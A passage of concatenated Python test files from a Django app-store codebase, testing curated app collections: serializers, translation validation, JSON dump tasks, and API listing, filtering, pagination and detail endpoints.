        eq_(data[0]['id'], int(self.app.pk))
        eq_(data[0]['resource_uri'], self.app.get_api_url(pk=self.app.pk))
        eq_(data[1]['id'], int(self.app2.id))
        eq_(data[1]['resource_uri'], self.app2.get_api_url(pk=self.app2.pk))
    def _field_to_native_profile(self, **kwargs):
        # Serialize the collection's apps with profile/device query params;
        # kwargs override the default 'pro'/'dev' values.
        query = {'pro': '0.0', 'dev': 'firefoxos'}
        query.update(kwargs)
        request = self.get_request(query)
        self.field.parent = self.collection
        self.field.source = 'apps'
        self.field.context['request'] = request
        return self.field.field_to_native(self.collection, 'apps')
    def test_ordering(self):
        self.app2 = amo.tests.app_factory()
        self.app2.addondevicetype_set.get_or_create(
            device_type=amo.DEVICE_GAIA.id)
        self.collection.add_app(self.app2, order=0)
        self.app3 = amo.tests.app_factory()
        self.app3.addondevicetype_set.get_or_create(
            device_type=amo.DEVICE_GAIA.id)
        self.collection.add_app(self.app3)
        result = self._field_to_native_profile()
        eq_(len(result), 3)
        eq_(int(result[0]['id']), self.app2.id)
        eq_(int(result[1]['id']), self.app.id)
        eq_(int(result[2]['id']), self.app3.id)
    def test_app_delete(self):
        self.app.delete()
        result = self._field_to_native_profile()
        eq_(len(result), 0)
    def test_app_disable(self):
        self.app.update(disabled_by_user=True)
        result = self._field_to_native_profile()
        eq_(len(result), 0)
    def test_app_pending(self):
        self.app.update(status=amo.STATUS_PENDING)
        result = self._field_to_native_profile()
        eq_(len(result), 0)
    def test_field_to_native_profile(self):
        result = self._field_to_native_profile(pro=self.profile)
        eq_(len(result), 1)
        eq_(int(result[0]['id']), self.app.id)
    def test_field_to_native_profile_mismatch(self):
        # App requires geolocation, which the profile does not provide.
        self.app.current_version.features.update(has_geolocation=True)
        result = self._field_to_native_profile(pro=self.profile)
        eq_(len(result), 0)
    def test_field_to_native_invalid_profile(self):
        result = self._field_to_native_profile(pro='muahahah')
        # Ensure that no filtering took place.
        eq_(len(result), 1)
        eq_(int(result[0]['id']), self.app.id)
    def test_field_to_native_device_filter(self):
        result = self._field_to_native_profile(pro='muahahah', dev='android',
                                               device='mobile')
        eq_(len(result), 0)
class TestCollectionMembershipField(BaseTestCollectionMembershipField,
                                    CollectionDataMixin, amo.tests.TestCase):
    """Run the shared membership-field tests against the database backend."""
    pass
class TestCollectionMembershipFieldES(BaseTestCollectionMembershipField,
                                      CollectionDataMixin,
                                      amo.tests.ESTestCase):
    """
    Same tests as TestCollectionMembershipField above, but we need a
    different setUp and more importantly, we need to force a sync refresh
    in ES when we modify our app.
    """
    fixtures = fixture('user_2519')
    def setUp(self):
        super(TestCollectionMembershipFieldES, self).setUp()
        self.field.context['view'] = FeaturedSearchView()
        self.user = UserProfile.objects.get(pk=2519)
        AddonUser.objects.create(addon=self.app, user=self.user)
        self.refresh('webapp')
    def _field_to_native_profile(self, **kwargs):
        """
        Like _field_to_native_profile in BaseTestCollectionMembershipField,
        but calling field_to_native_es directly.
        """
        query = {'pro': '0.0', 'dev': 'firefoxos'}
        query.update(kwargs)
        request = self.get_request(query)
        self.field.context['request'] = request
        return self.field.field_to_native_es(self.collection, request)
    def test_field_to_native_profile_mismatch(self):
        self.app.current_version.features.update(has_geolocation=True)
        # FIXME: a simple refresh() wasn't enough, don't we reindex apps when
        # feature profiles change ? Investigate.
        self.reindex(self.app.__class__, 'webapp')
        result = self._field_to_native_profile(pro=self.profile)
        eq_(len(result), 0)
    def test_ordering(self):
        self.app2 = amo.tests.app_factory()
        self.collection.add_app(self.app2, order=0)
        self.app3 = amo.tests.app_factory()
        self.collection.add_app(self.app3)
        # Extra app not belonging to a collection.
        amo.tests.app_factory()
        # Extra collection that has the apps in different positions.
        extra_collection = Collection.objects.create(**self.collection_data)
        extra_collection.add_app(self.app3)
        extra_collection.add_app(self.app2)
        extra_collection.add_app(self.app)
        # Force refresh in ES.
        self.refresh('webapp')
        request = self.get_request()
        self.field.context['request'] = request
        result = self.field.field_to_native_es(self.collection, request)
        # Ordering must follow THIS collection, not the extra one.
        eq_(len(result), 3)
        eq_(int(result[0]['id']), self.app2.id)
        eq_(int(result[1]['id']), self.app.id)
        eq_(int(result[2]['id']), self.app3.id)
    def test_app_delete(self):
        self.app.delete()
        self.refresh('webapp')
        result = self._field_to_native_profile()
        eq_(len(result), 0)
    def test_app_disable(self):
        self.app.update(disabled_by_user=True)
        self.refresh('webapp')
        result = self._field_to_native_profile()
        eq_(len(result), 0)
    def test_app_pending(self):
        self.app.update(status=amo.STATUS_PENDING)
        self.refresh('webapp')
        result = self._field_to_native_profile()
        eq_(len(result), 0)
class TestCollectionSerializer(CollectionDataMixin, amo.tests.TestCase):
    """CollectionSerializer round-trip tests: serialization output keys,
    image URL rendering, translated-field validation and deserialization,
    and the operator-shelf/category mutual-exclusion rule."""
    def setUp(self):
        minimal_context = {
            'request': RequestFactory().get('/whatever')
        }
        self.collection = Collection.objects.create(**self.collection_data)
        self.serializer = CollectionSerializer(self.collection,
                                               context=minimal_context)
    def test_metadata_is_serialized_to_json(self):
        ok_(json.dumps(self.serializer.metadata()))
    def test_to_native(self, apps=None):
        # Also used as a helper by test_to_native_with_apps; returns the
        # serialized data for further inspection.
        if apps:
            for app in apps:
                self.collection.add_app(app)
        else:
            apps = []
        data = self.serializer.to_native(self.collection)
        for name, value in self.collection_data.iteritems():
            eq_(self.collection_data[name], data[name])
        self.assertSetEqual(data.keys(), [
            'apps', 'author', 'background_color', 'carrier', 'category',
            'collection_type', 'default_language', 'description', 'id',
            'image', 'is_public', 'name', 'region', 'slug', 'text_color'
        ])
        for order, app in enumerate(apps):
            eq_(data['apps'][order]['slug'], app.app_slug)
        return data
    def test_to_native_operator(self):
        # Operator shelves additionally expose 'can_be_hero'.
        self.collection.update(collection_type=COLLECTIONS_TYPE_OPERATOR)
        data = self.serializer.to_native(self.collection)
        ok_('can_be_hero' in data.keys())
    @override_settings(STATIC_URL='https://testserver-cdn/')
    def test_image(self):
        data = self.serializer.to_native(self.collection)
        eq_(data['image'], None)
        # The image hash is appended as a cache-busting querystring.
        self.collection.update(image_hash='bbbbbb')
        data = self.serializer.to_native(self.collection)
        self.assertApiUrlEqual(data['image'],
            '/rocketfuel/collections/%s/image.png?bbbbbb' % self.collection.pk,
            scheme='https', netloc='testserver-cdn')
    def test_wrong_default_language_serialization(self):
        # The following is wrong because we only accept the 'en-us' form.
        data = {'default_language': u'en_US'}
        serializer = CollectionSerializer(instance=self.collection, data=data,
                                          partial=True)
        eq_(serializer.is_valid(), False)
        ok_('default_language' in serializer.errors)
    def test_name_required(self):
        data = {
            'description': u'some description',
            'collection_type': u'1'
        }
        serializer = CollectionSerializer(instance=self.collection, data=data)
        eq_(serializer.is_valid(), False)
        ok_('name' in serializer.errors)
    def test_name_cannot_be_empty(self):
        data = {
            'name': u''
        }
        serializer = CollectionSerializer(instance=self.collection, data=data,
                                          partial=True)
        eq_(serializer.is_valid(), False)
        ok_('name' in serializer.errors)
        eq_(serializer.errors['name'],
            [u'The field must have a length of at least 1 characters.'])
    def test_name_all_locales_cannot_be_empty(self):
        data = {
            'name': {
                'fr': u'',
                'en-US': u''
            }
        }
        serializer = CollectionSerializer(instance=self.collection, data=data,
                                          partial=True)
        eq_(serializer.is_valid(), False)
        ok_('name' in serializer.errors)
    def test_name_one_locale_must_be_non_empty(self):
        # A single non-empty translation is enough.
        data = {
            'name': {
                'fr': u'',
                'en-US': u'Non-Empty Name'
            }
        }
        serializer = CollectionSerializer(instance=self.collection, data=data,
                                          partial=True)
        eq_(serializer.is_valid(), True)
    def test_translation_deserialization(self):
        data = {
            'name': u'¿Dónde está la biblioteca?'
        }
        serializer = CollectionSerializer(instance=self.collection, data=data,
                                          partial=True)
        eq_(serializer.errors, {})
        ok_(serializer.is_valid())
    def test_translation_deserialization_multiples_locales(self):
        data = {
            'name': {
                'fr': u'Chat grincheux…',
                'en-US': u'Grumpy Cat...'
            }
        }
        serializer = CollectionSerializer(instance=self.collection, data=data,
                                          partial=True)
        eq_(serializer.errors, {})
        ok_(serializer.is_valid())
    def test_empty_choice_deserialization(self):
        # Build data from existing object.
        data = self.serializer.to_native(self.collection)
        data.pop('id')
        # Emulate empty values passed via POST.
        data.update({'carrier': '', 'region': ''})
        instance = self.serializer.from_native(data, None)
        eq_(self.serializer.errors, {})
        ok_(self.serializer.is_valid())
        eq_(instance.region, None)
        eq_(instance.carrier, None)
    def test_to_native_with_apps(self):
        apps = [amo.tests.app_factory() for n in xrange(1, 5)]
        data = self.test_to_native(apps=apps)
        keys = data['apps'][0].keys()
        ok_('name' in keys)
        ok_('id' in keys)
    def validate(self, **kwargs):
        return self.serializer.validate(kwargs)
    def test_validation_operatorshelf_category(self):
        # Operator shelves may not also set a category.
        category = Category.objects.create(name='BastaCorp', slug='basta',
                                           type=amo.ADDON_WEBAPP)
        ok_(self.validate(collection_type=COLLECTIONS_TYPE_BASIC,
                          category=category))
        ok_(self.validate(collection_type=COLLECTIONS_TYPE_OPERATOR))
        with self.assertRaises(serializers.ValidationError):
            self.validate(collection_type=COLLECTIONS_TYPE_OPERATOR,
                          category=category)
# Small animated GIF, base64-encoded; used as the image payload in the
# DataURLImageField test below.
IMAGE_DATA = """
R0lGODlhKAAoAPMAAP////vzBf9kA90JB/IIhEcApQAA0wKr6h+3FABkElYsBZBxOr+/v4CAgEBA
QAAAACH/C05FVFNDQVBFMi4wAwEAAAAh/h1HaWZCdWlsZGVyIDAuMiBieSBZdmVzIFBpZ3VldAAh
+QQECgD/ACwAAAAAKAAoAEMEx5DJSSt9z+rNcfgf5oEBxlVjWIreQ77wqqWrW8e4fKJ2ru9ACS2U
CW6GIBaSOOu9lMknK2dqrog2pYhp7Dir3fAIHN4tk8XyBKmFkU9j0tQnT6+d2K2qrnen2W10MW93
WIZogGJ4dIRqZ41qTZCRXpOUPHWXXjiWioKdZniBaI6LNX2ZQS1aLnOcdhYpPaOfsAxDrXOiqKlL
rL+0mb5Qg7ypQru5Z1S2yIiHaK9Aq1lfxFxGLYe/P2XLUprOzOGY4ORW3edNkREAIfkEBAoA/wAs
AAAAACgAKABDBMqQyUkrfc/qzXH4YBhiXOWNAaZ6q+iS1vmps1y3Y1aaj/vqu6DEVhN2einfipgC
XpA/HNRHbW5YSFpzmXUaY1PYd3wSj3fM3JlXrZpLsrIc9wNHW71pGyRmcpM0dHUaczc5WnxeaHp7
b2sMaVaPQSuTZCqWQjaOmUOMRZ2ee5KTkVSci22CoJRQiDeviXBhh1yfrBNEWH+jspC3S3y9dWnB
sb1muru1x6RshlvMeqhP0U3Sal8s0LZ5ikamItTat7ihft+hv+bqYI8RADs=
"""
class TestDataURLImageField(CollectionDataMixin, amo.tests.TestCase):
    """DataURLImageField must decode a base64 data: URL into raw bytes plus
    an 8-character md5 digest of those bytes."""
    def test_from_native(self):
        data, hash_ = DataURLImageField().from_native(
            'data:image/gif;base64,' + IMAGE_DATA)
        # Hash is the first 8 hex chars of the md5 of the decoded payload.
        eq_(hash_, hashlib.md5(IMAGE_DATA.decode('base64')).hexdigest()[:8])
        eq_(data.read(), IMAGE_DATA.decode('base64'))
########NEW FILE########
__FILENAME__ = test_tasks
import json
import mock
from tempfile import mkdtemp
from django.test.utils import override_settings
from nose.tools import eq_
import amo
import amo.tests
from mkt.collections.models import Collection
from mkt.collections.tasks import dump_collection, dump_collections
from mkt.webapps.tasks import rm_directory
from mkt.site.fixtures import fixture
# Scratch directory installed as DUMPED_APPS_PATH via override_settings on
# TestDumpCollections below; removed again in its tearDown.
temp_directory = mkdtemp()
@override_settings(DUMPED_APPS_PATH=temp_directory)
class TestDumpCollections(amo.tests.TestCase):
    """Tests for the collection dump tasks (dump_collection /
    dump_collections): output contents and public-only filtering."""
    fixtures = fixture('webapp_337141', 'collection_81721')
    def get_collection(self):
        return Collection.objects.get(pk=81721)
    def tearDown(self):
        rm_directory(temp_directory)
    def _read_json(self, filename):
        # Use a context manager so the dumped file's handle is closed
        # deterministically (the original `json.load(open(...))` left it
        # open until garbage collection).
        with open(filename, 'r') as f:
            return json.load(f)
    def test_dump_collections(self):
        filename = dump_collections([81721])[0]
        collection_json = self._read_json(filename)
        eq_(collection_json['id'], 81721)
        eq_(collection_json['slug'], 'public-apps')
    def test_dump_collection(self):
        collection = self.get_collection()
        filename = dump_collection(collection)
        collection_json = self._read_json(filename)
        eq_(collection_json['id'], 81721)
        eq_(collection_json['slug'], 'public-apps')
    @mock.patch('mkt.collections.tasks.dump_collection')
    def test_dumps_public_collection(self, dump_collection):
        dump_collections([81721])
        assert dump_collection.called
    @mock.patch('mkt.collections.tasks.dump_collection')
    def test_doesnt_dump_public_collection(self, dump_collection):
        # Non-public collections must be skipped by dump_collections.
        collection = self.get_collection()
        collection.update(is_public=False)
        dump_collections([81721])
        assert not dump_collection.called
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import hashlib
import json
import os
from random import shuffle
from urlparse import urlparse
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.http import QueryDict
from django.test.utils import override_settings
from django.utils import translation
from nose import SkipTest
from nose.tools import eq_, ok_
from PIL import Image
from rest_framework.exceptions import PermissionDenied
import amo
import amo.tests
import mkt
from addons.models import Category
from amo.utils import slugify
from mkt.api.tests.test_oauth import RestOAuth
from mkt.collections.constants import (COLLECTIONS_TYPE_BASIC,
COLLECTIONS_TYPE_FEATURED,
COLLECTIONS_TYPE_OPERATOR)
from mkt.collections.models import Collection
from mkt.collections.views import CollectionViewSet
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.collections.tests.test_serializers import (CollectionDataMixin,
IMAGE_DATA)
from users.models import UserProfile
class BaseCollectionViewSetTest(RestOAuth):
    """
    Base class for all CollectionViewSet tests.
    """
    fixtures = fixture('user_2519', 'user_999')
    def setUp(self):
        super(BaseCollectionViewSetTest, self).setUp()
        self.collection_data = {
            'author': u'My Àuthør',
            'background_color': '#FFF000',
            'collection_type': COLLECTIONS_TYPE_BASIC,
            'description': {'en-US': u'A cöllection of my favorite games'},
            'is_public': True,
            'name': {'en-US': u'My Favorite Gamés'},
            'slug': u'my-favourite-gamés',
            'text_color': '#000FFF',
        }
        self.collection = Collection.objects.create(**self.collection_data)
        self.apps = []
        self.list_url = reverse('collections-list')
        self.user = UserProfile.objects.get(pk=2519)
        self.user2 = UserProfile.objects.get(pk=999)
    def setup_unique(self):
        """
        Additional setup required to test collection category/region/carrier
        uniqueness constraints.
        """
        self.category = Category.objects.create(type=amo.ADDON_WEBAPP,
            name='Grumpy', slug='grumpy-cat')
        self.collection_data = {
            'collection_type': COLLECTIONS_TYPE_FEATURED,
            'name': 'Featured Apps are cool',
            'slug': 'featured-apps-are-cool',
            'description': 'Featured Apps really are the bomb',
            'region': mkt.regions.SPAIN.id,
            'carrier': mkt.carriers.TELEFONICA.id,
            'category': self.category,
            'is_public': True,
        }
        self.collection = Collection.objects.create(**self.collection_data)
        self.grant_permission(self.profile, 'Collections:Curate')
    def create_apps(self, number=1):
        """
        Create `number` apps, adding them to `self.apps`.
        """
        for n in xrange(0, number):
            self.apps.append(amo.tests.app_factory())
    def add_apps_to_collection(self, *args):
        """
        Add each app passed to `*args` to `self.collection`.
        """
        for app in args:
            self.collection.add_app(app)
    def make_curator(self):
        """
        Make the authenticating user a curator on self.collection.
        """
        self.collection.add_curator(self.profile)
    def make_publisher(self):
        """
        Grant the Collections:Curate permission to the authenticating user.
        """
        self.grant_permission(self.profile, 'Collections:Curate')
    def collection_url(self, action, pk):
        """
        Return the URL to a collection API endpoint with primary key `pk` to do
        action `action`.
        """
        return reverse('collections-%s' % action, kwargs={'pk': pk})
    def create_additional_data(self):
        """
        Creates two additional categories and three additional collections.
        """
        self.category = Category.objects.create(slug='ccc', name='CatCatCat',
                                                type=amo.ADDON_WEBAPP)
        self.empty_category = Category.objects.create(slug='emptycat',
                                                      name='Empty Cat',
                                                      type=amo.ADDON_WEBAPP)
        eq_(Category.objects.count(), 2)
        # Region-only collection.
        collection_data = {
            'collection_type': COLLECTIONS_TYPE_BASIC,
            'description': 'A collection of my favorite spanish games',
            'name': 'My Favorite spanish games',
            'region': mkt.regions.SPAIN.id,
            'carrier': mkt.carriers.UNKNOWN_CARRIER.id,
        }
        self.collection2 = Collection.objects.create(**collection_data)
        # Carrier-only collection.
        collection_data = {
            'collection_type': COLLECTIONS_TYPE_BASIC,
            'description': 'A collection of my favorite phone games',
            'name': 'My Favorite phone games',
            'carrier': mkt.carriers.TELEFONICA.id,
        }
        self.collection3 = Collection.objects.create(**collection_data)
        # Region + carrier + category collection.
        collection_data = {
            'collection_type': COLLECTIONS_TYPE_BASIC,
            'description': 'A collection of my favorite categorized games',
            'name': 'My Favorite categorized games',
            'region': mkt.regions.SPAIN.id,
            'carrier': mkt.carriers.TELEFONICA.id,
            'category': self.category
        }
        self.collection4 = Collection.objects.create(**collection_data)
class TestCollectionViewSetListing(BaseCollectionViewSetTest):
    """
    Tests the handling of GET/OPTIONS requests to the list endpoint of
    CollectionViewSet.
    """
    def listing(self, client):
        """
        Shared helper: GET the list endpoint with `client`, then check both
        the collection metadata and the ordering of its apps.
        """
        self.create_apps()
        self.add_apps_to_collection(*self.apps)
        res = client.get(self.list_url)
        data = json.loads(res.content)
        eq_(res.status_code, 200)
        collection = data['objects'][0]
        apps = collection['apps']
        # Verify that the apps are present in the correct order.
        for order, app in enumerate(self.apps):
            eq_(apps[order]['slug'], app.app_slug)
        # Verify that the collection metadata is intact.
        for field, value in self.collection_data.iteritems():
            eq_(collection[field], self.collection_data[field])

    def test_listing(self):
        self.listing(self.anon)

    def test_listing_no_perms(self):
        self.listing(self.client)

    def test_listing_has_perms(self):
        self.make_publisher()
        self.listing(self.client)

    def test_options_has_perms(self):
        self.make_publisher()
        res = self.client.options(self.list_url)
        eq_(res.status_code, 200)

    def test_listing_curator(self):
        self.make_curator()
        self.listing(self.client)

    def test_listing_single_lang(self):
        # With ?lang=fr translated fields come back as flat strings in that
        # language; fields without a french translation (description) fall
        # back to their existing value.
        self.collection.name = {
            'fr': u'Basta la pomme de terre frite',
        }
        self.collection.save()
        res = self.client.get(self.list_url, {'lang': 'fr'})
        data = json.loads(res.content)
        eq_(res.status_code, 200)
        collection = data['objects'][0]
        eq_(collection['name'], u'Basta la pomme de terre frite')
        eq_(collection['description'], u'A cöllection of my favorite games')

    def test_listing_filter_unowned_hidden(self):
        """
        Hidden collections that you do not own should not be returned.
        """
        self.create_apps()
        self.add_apps_to_collection(*self.apps)
        self.collection.update(is_public=False)
        res = self.client.get(self.list_url)
        data = json.loads(res.content)
        eq_(res.status_code, 200)
        eq_(len(data['objects']), 0)

    def test_listing_filter_owned_hidden(self):
        """
        Hidden collections that you do own should be returned.
        """
        self.create_apps()
        self.add_apps_to_collection(*self.apps)
        self.collection.update(is_public=False)
        self.collection.curators.add(self.user)
        res = self.client.get(self.list_url)
        data = json.loads(res.content)
        eq_(res.status_code, 200)
        eq_(len(data['objects']), 1)

    def test_listing_pagination(self):
        self.create_additional_data()
        self.make_publisher()  # To be able to see non-public collections.
        res = self.client.get(self.list_url, {'limit': 3})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 3)
        # Most recently created collections come first.
        eq_(data['objects'][0]['id'], self.collection4.pk)
        eq_(data['objects'][1]['id'], self.collection3.pk)
        eq_(data['objects'][2]['id'], self.collection2.pk)
        eq_(data['meta']['total_count'], 4)
        eq_(data['meta']['limit'], 3)
        eq_(data['meta']['previous'], None)
        eq_(data['meta']['offset'], 0)
        next_page = urlparse(data['meta']['next'])
        ok_(next_page.path.startswith('/api/v1'))
        eq_(next_page.path, self.list_url)
        eq_(QueryDict(next_page.query).dict(),
            {u'limit': u'3', u'offset': u'3'})

        # Follow the `next` link and check the second (final) page.
        res = self.client.get(self.list_url, {'limit': 3, 'offset': 3})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 1)
        eq_(data['objects'][0]['id'], self.collection.pk)
        eq_(data['meta']['total_count'], 4)
        eq_(data['meta']['limit'], 3)
        prev_page = urlparse(data['meta']['previous'])
        ok_(prev_page.path.startswith('/api/v1'))
        # Bug fix: the original re-asserted `next.path` here; the intent was
        # clearly to check the path of the `previous` link parsed just above.
        eq_(prev_page.path, self.list_url)
        eq_(QueryDict(prev_page.query).dict(),
            {u'limit': u'3', u'offset': u'0'})
        eq_(data['meta']['offset'], 3)
        eq_(data['meta']['next'], None)

    def test_listing_no_filtering(self):
        self.create_additional_data()
        self.make_publisher()
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 4)
        ok_('API-Fallback' not in res)

    def test_listing_filtering_error(self):
        res = self.client.get(self.list_url, {'region': 'whateverdude'})
        eq_(res.status_code, 400)
        data = json.loads(res.content)
        eq_(data['detail'], 'Filtering error.')
        errors = data['filter_errors']
        ok_(errors['region'][0].startswith('Select a valid choice.'))

    def test_listing_filtering_worldwide(self):
        # 'worldwide' is accepted as a legacy alias of 'restofworld' and
        # returns identical results.
        self.create_additional_data()
        self.make_publisher()
        row_res = self.client.get(self.list_url, {'region': 'restofworld'})
        row_data = json.loads(row_res.content)
        ww_res = self.client.get(self.list_url, {'region': 'worldwide'})
        ww_data = json.loads(ww_res.content)
        eq_(row_res.status_code, 200)
        eq_(ww_res.status_code, 200)
        eq_(len(row_data['objects']), 2)
        eq_(row_data, ww_data)

    def test_listing_filtering_region(self):
        self.create_additional_data()
        self.make_publisher()
        self.collection.update(region=mkt.regions.PL.id)
        res = self.client.get(self.list_url,
                              {'region': mkt.regions.SPAIN.slug})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 2)
        eq_(collections[0]['id'], self.collection4.pk)
        eq_(collections[1]['id'], self.collection2.pk)
        ok_('API-Fallback' not in res)

    def test_listing_filtering_region_id(self):
        # Filtering by numeric region id must behave like the slug variant.
        self.create_additional_data()
        self.make_publisher()
        self.collection.update(region=mkt.regions.PL.id)
        res = self.client.get(self.list_url,
                              {'region': mkt.regions.SPAIN.id})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 2)
        eq_(collections[0]['id'], self.collection4.pk)
        eq_(collections[1]['id'], self.collection2.pk)
        ok_('API-Fallback' not in res)

    def test_listing_filtering_carrier(self):
        self.create_additional_data()
        self.make_publisher()
        res = self.client.get(self.list_url,
                              {'carrier': mkt.carriers.TELEFONICA.slug})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 2)
        eq_(collections[0]['id'], self.collection4.pk)
        eq_(collections[1]['id'], self.collection3.pk)
        ok_('API-Fallback' not in res)

    def test_listing_filtering_carrier_id(self):
        # Filtering by numeric carrier id must behave like the slug variant.
        self.create_additional_data()
        self.make_publisher()
        res = self.client.get(self.list_url,
                              {'carrier': mkt.carriers.TELEFONICA.id})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 2)
        eq_(collections[0]['id'], self.collection4.pk)
        eq_(collections[1]['id'], self.collection3.pk)
        ok_('API-Fallback' not in res)

    def test_listing_filtering_carrier_null(self):
        # An empty carrier value filters on carrier=NULL.
        self.create_additional_data()
        self.make_publisher()
        res = self.client.get(self.list_url, {'carrier': ''})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 1)
        eq_(collections[0]['id'], self.collection.pk)
        ok_('API-Fallback' not in res)

    def test_listing_filtering_carrier_0(self):
        # UNKNOWN_CARRIER has id 0, which is falsy: make sure it is still
        # treated as a real carrier value and not as "no carrier".
        self.create_additional_data()
        self.make_publisher()
        res = self.client.get(self.list_url,
                              {'carrier': mkt.carriers.UNKNOWN_CARRIER.id})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 1)
        eq_(collections[0]['id'], self.collection2.pk)
        ok_('API-Fallback' not in res)

    def test_listing_filtering_region_null(self):
        # An empty region value filters on region=NULL.
        self.create_additional_data()
        self.make_publisher()
        res = self.client.get(self.list_url, {'region': ''})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 2)
        eq_(collections[0]['id'], self.collection3.pk)
        eq_(collections[1]['id'], self.collection.pk)
        ok_('API-Fallback' not in res)

    def test_listing_filtering_category(self):
        self.create_additional_data()
        self.make_publisher()
        res = self.client.get(self.list_url, {'cat': self.category.slug})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 1)
        eq_(collections[0]['id'], self.collection4.pk)
        ok_('API-Fallback' not in res)

    def test_listing_filtering_category_id(self):
        # Filtering by numeric category pk must behave like the slug variant.
        self.create_additional_data()
        self.make_publisher()
        res = self.client.get(self.list_url, {'cat': self.category.pk})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 1)
        eq_(collections[0]['id'], self.collection4.pk)
        ok_('API-Fallback' not in res)

    def test_listing_filtering_category_null(self):
        # An empty category value filters on category=NULL.
        self.create_additional_data()
        self.make_publisher()
        res = self.client.get(self.list_url, {'cat': ''})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 3)
        eq_(collections[0]['id'], self.collection3.pk)
        eq_(collections[1]['id'], self.collection2.pk)
        eq_(collections[2]['id'], self.collection.pk)
        ok_('API-Fallback' not in res)

    def test_listing_filtering_category_region_carrier(self):
        self.create_additional_data()
        self.make_publisher()
        res = self.client.get(self.list_url, {
            'cat': self.category.slug,
            'region': mkt.regions.SPAIN.slug,
            'carrier': mkt.carriers.TELEFONICA.slug
        })
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 1)
        eq_(collections[0]['id'], self.collection4.pk)
        ok_('API-Fallback' not in res)

    def test_listing_filtering_category_region_carrier_fallback(self):
        self.create_additional_data()
        self.make_publisher()
        # Test filtering with a non-existent category + region + carrier.
        # It should fall back on category + carrier + region=NULL, not find
        # anything either, then fall back to category + region + carrier=NULL,
        # again not find anything, then category + region=NULL + carrier=NULL,
        # and stop there, still finding no results.
        res = self.client.get(self.list_url, {
            'cat': self.empty_category.slug,
            'region': mkt.regions.SPAIN.slug,
            'carrier': mkt.carriers.SPRINT.slug
        })
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 0)
        eq_(res['API-Fallback'], 'region,carrier')

    def test_listing_filtering_nonexistant_carrier(self):
        self.create_additional_data()
        self.make_publisher()
        Collection.objects.all().update(carrier=mkt.carriers.TELEFONICA.id)
        self.collection.update(region=mkt.regions.SPAIN.id, carrier=None)
        # Test filtering with a region+carrier that doesn't match any
        # Collection. It should fall back on region=NULL+carrier, not find
        # anything, then fallback on carrier=NULL+region and find the
        # Collection left in spain with no carrier.
        res = self.client.get(self.list_url, {
            'region': mkt.regions.SPAIN.slug,
            'carrier': mkt.carriers.SPRINT.slug
        })
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 1)
        eq_(collections[0]['id'], self.collection.pk)
        eq_(res['API-Fallback'], 'carrier')

    def test_listing_filtering_nonexistant_carrier_and_region(self):
        self.create_additional_data()
        self.make_publisher()
        nyan = Category.objects.create(type=amo.ADDON_WEBAPP, name='Nyan Cat',
                                       slug='nyan-cat')
        Collection.objects.all().update(carrier=None, region=None,
                                        category=nyan)
        self.collection.update(category=self.category)
        # Test filtering with a non-existent carrier and region. It should
        # go through all fallback till ending up filtering on category +
        # carrier=NULL + region=NULL.
        res = self.client.get(self.list_url, {
            'region': mkt.regions.UK.slug,
            'carrier': mkt.carriers.SPRINT.slug,
            'cat': self.category.pk
        })
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        collections = data['objects']
        eq_(len(collections), 1)
        eq_(collections[0]['id'], self.collection.pk)
        eq_(res['API-Fallback'], 'region,carrier')
class TestCollectionViewSetDetail(BaseCollectionViewSetTest):
    """
    Tests the handling of GET requests to a single collection on
    CollectionViewSet.
    """
    def detail(self, client, collection_id=None):
        # Shared helper: GET the detail endpoint (by pk, or by slug when
        # `collection_id` is given) and verify both the collection metadata
        # and the ordering of its apps. Returns (response, decoded JSON).
        self.create_apps(number=2)
        self.add_apps_to_collection(*self.apps)
        url = self.collection_url('detail',
                                  collection_id or self.collection.pk)
        res = client.get(url)
        data = json.loads(res.content)
        eq_(res.status_code, 200)
        # Verify that the collection metadata is intact.
        for field, value in self.collection_data.iteritems():
            eq_(data[field], self.collection_data[field])
        # Verify that the apps are present in the correct order.
        for order, app in enumerate(self.apps):
            eq_(data['apps'][order]['slug'], app.app_slug)
        return res, data
    def test_detail_filtering(self):
        # region/carrier filtering applies to the list endpoint only; detail
        # requests must ignore it and always return the collection.
        self.collection.update(region=mkt.regions.SPAIN.id)
        url = self.collection_url('detail', self.collection.pk)
        res = self.client.get(url, {
            'region': mkt.regions.RESTOFWORLD.slug
        })
        # Filtering should not be applied.
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['id'], self.collection.pk)
        ok_('API-Fallback' not in res)
    def test_detail(self):
        res, data = self.detail(self.anon)
        # No image uploaded yet, so the serialized image URL is empty/falsy.
        ok_(not data['image'])
    @override_settings(STATIC_URL='https://testserver-cdn/')
    def test_detail_image(self):
        # Once an image exists (hash set), the API exposes a CDN-based image
        # URL carrying the hash as a cache-busting query string.
        storage.open(self.collection.image_path(), 'w').write(IMAGE_DATA)
        self.collection.update(image_hash='bbbbbb')
        res, data = self.detail(self.anon)
